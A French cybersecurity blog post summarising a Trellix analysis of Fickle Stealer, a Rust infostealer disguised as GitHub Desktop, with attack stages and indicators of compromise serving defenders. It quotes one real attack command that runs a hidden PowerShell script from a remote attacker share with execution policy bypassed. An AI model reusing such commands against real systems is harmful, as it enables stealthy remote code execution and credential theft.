Analyse Mail Phishing
#Phishing en entreprise : une plongée dans la détection et l’analyse d’un mail malveillant
Bandeau Obscura Ransomware
#Obscura en action : découverte et analyse de ce "nouveau" ransomware
Gremlin Stealer
#Gremlin Stealer : Le nouveau voleur d’informations en vogue
Illustration du malware Chaya_003
#Chaya_003 : Un malware qui sème le chaos dans les systèmes OT industriels

Date : 11 novembre 2024

Fickle Stealer : Le Malware Basé sur Rust qui Se Déguise en GitHub Desktop

Encore un autre malware déguisé en application légitime ! Le Fickle Stealer, un malware basé sur Rust, fait son apparition dans le monde de la cybersécurité. D'après un rapport des chercheurs de Trellix, Mallikarjun Wali et Sangram Mohapatro, cette menace est bien plus sophistiquée qu'elle en a l'air. Elle vole des informations sensibles telles que des identifiants personnels, l'historique de navigation et même des informations sur les portefeuilles de cryptomonnaie.

Comment ça fonctionne ? Spoiler : Ce n'est pas GitHub Desktop

Fickle Stealer se présente comme une application légitime, notamment GitHub Desktop pour Windows, avec une signature numérique qui prétend être de GitHub Inc. (et signée par Microsoft Public RSA Time Stamping Authority – un petit clin d'œil à la crédibilité !). Mais attention, cette signature est factice, un petit détail que le malware utilise pour tromper les victimes et éviter la détection.

Les étapes de l'attaque : Un vrai chef-d'œuvre de manipulation

Une fois exécuté, Fickle Stealer contourne le contrôle des comptes utilisateurs (UAC) via un script PowerShell et se connecte à un serveur de commande et contrôle (C2). Le malware utilise des techniques d'obfuscation et de anti-analyse pour échapper aux outils de détection traditionnels et rester discret, tout en siphonnant des données sensibles des systèmes infectés.

Le Script PowerShell et l'Ingénierie Sociale : Le Combo Parfait

Le malware active un script PowerShell (bypass.ps1 ou u.ps1), qui envoie des informations sensibles via un bot Telegram, telles que l'adresse IP, le pays et le système d'exploitation de la victime. Mais ne vous inquiétez pas, tout ça se fait en secret avec des commandes comme :
cmd /c powershell.exe -nop -win hidden -ExecutionPolicy Bypass -File \\\\185[.]213[.]208[.]245\\bypass\\u.ps1

Une Infection en Profondeur : Pas de Repos pour les Victimes

Le script engine.ps1 explore l'ordinateur infecté pour chercher des exécutables et y insérer son propre code. En plus, les chemins des fichiers infectés sont encodés en base64 pour éviter les injections répétées. Bref, une vraie œuvre d'art de persistance et de propagation sur tout le système. Fickle Stealer va là où ça fait mal !

Comment Protéger votre Système ?

La réponse est simple mais cruciale : mettez à jour vos protocoles de sécurité, contrôlez régulièrement l'accès aux systèmes et restez vigilants face aux attaques d'ingénierie sociale. À moins que vous n'aimiez avoir des visiteurs malintentionnés dans vos données personnelles, bien sûr.

Indicateurs de Compromission (IoCs)

Les Payloads ci-dessous communiquent des fichiers à l'adresse 185[.]213[.]208[.]245\\bypass\\u.ps1

Payloads:

  • 022bf939e575b38578560fbba65a4cbebc43e5fbb54983fc845dbbc81420ff7c - Dctooux.exe
  • 2105c78e2d975be2e83f16eaaa4120aba22e19e37ba1c8aedabd6922725b3f99 - meLabsReg.exe
  • 4291bad1e35d8a8cdd7c9f5d1bdfdc0e9a1f1c956f9d348a3a068f2c854f54b1 - PLCPASS.exe
  • 7f5765e368b5ee21568b1d208cad821f01d8c1520ff7789529494db69d45c257 - Bootstrapper.exe
  • 2357bdb0f5b32ad86c8b0b6ae44ae8e47eb17327f1aac400b971b95e8648edd0 - AnyDesk.exe

Fichiers de Scripts :

U.ps1:

  • 47e4142fa6ab10a2d7dc0423d41f9bdbb3ced0f4fae5c58b673386d11dd8c973
  • 94ee2227696da3049ff67592834b4b6f98186f91e6d1cd1eeec44f24b9df754b

engine.ps1:

  • f080d7803ce1a1b9dc72da6ddf0dd17e23eb8227c497f09aa7dfd6f3b5be3a66

Détections Trellix ENS pour les IoCs:

  • PS/Agent.jk
  • Generic Obfuscated.g
  • Trojan-FWZD

Site Web Malveillant:

Le site hxxp://185[.]213[.]208[.]245 est marqué comme un site malveillant et de phishing à haut risque par Skyhigh Security sur https://trustedsource.org/.

@NOP_FIX 2025